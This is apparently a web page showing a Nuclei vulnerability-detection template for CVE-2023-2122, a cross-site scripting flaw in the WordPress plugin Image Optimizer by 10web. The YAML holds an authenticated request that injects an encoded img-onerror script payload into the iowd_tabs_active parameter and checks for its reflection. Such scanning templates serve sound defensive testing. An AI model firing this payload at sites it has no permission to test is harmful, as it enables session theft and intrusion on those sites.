Image Optimizer by 10web < 1.0.26 - Cross-Site Scripting
ID: CVE-2023-2122
Severity: medium
Author: r3Y3r53
Tags: cve2023,cve,wpscan,xss,image-optimizer-wd,wordpress,wp-plugin,wp,authenticated,10web
Description
Section titled “Description”Image Optimizer by 10web before 1.0.26 is susceptible to cross-site scripting via the iowd_tabs_active parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
YAML Source
Section titled “YAML Source”id: CVE-2023-2122
info: name: Image Optimizer by 10web < 1.0.26 - Cross-Site Scripting author: r3Y3r53 severity: medium description: | Image Optimizer by 10web before 1.0.26 is susceptible to cross-site scripting via the iowd_tabs_active parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. remediation: Fixed in version 1.0.27 reference: - https://wpscan.com/vulnerability/936fd93a-428d-4744-a4fc-c8da78dcbe78 - https://wordpress.org/plugins/image-optimizer-wd/advanced/ - https://nvd.nist.gov/vuln/detail/CVE-2023-2122 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-2122 cwe-id: CWE-79 epss-score: 0.00071 epss-percentile: 0.30429 cpe: cpe:2.3:a:10web:image_optimizer:*:*:*:*:*:wordpress:*:* metadata: verified: "true" max-request: 2 vendor: 10web product: image_optimizer framework: wordpress tags: cve2023,cve,wpscan,xss,image-optimizer-wd,wordpress,wp-plugin,wp,authenticated,10web
http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In - | GET /wp-admin/admin.php?page=iowd_settings&msg=1&iowd_tabs_active=generalry8uo%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ef0cmo HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'status_code_2 == 200' - 'contains(content_type, "text/html")' - 'contains(body_2, "<img src=a onerror=alert(document.domain)>")' - 'contains(body_2, "Image optimizer")' condition: and# digest: 490a0046304402207d5fb24a62ca094528fac55c856b6fd20da263fb483323d47a2d89e4bb1326ed02201bc5590e57f51bbd6dc50cb7ad17f058d83126de559202227dc5b7f15b444035:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-2122.yaml"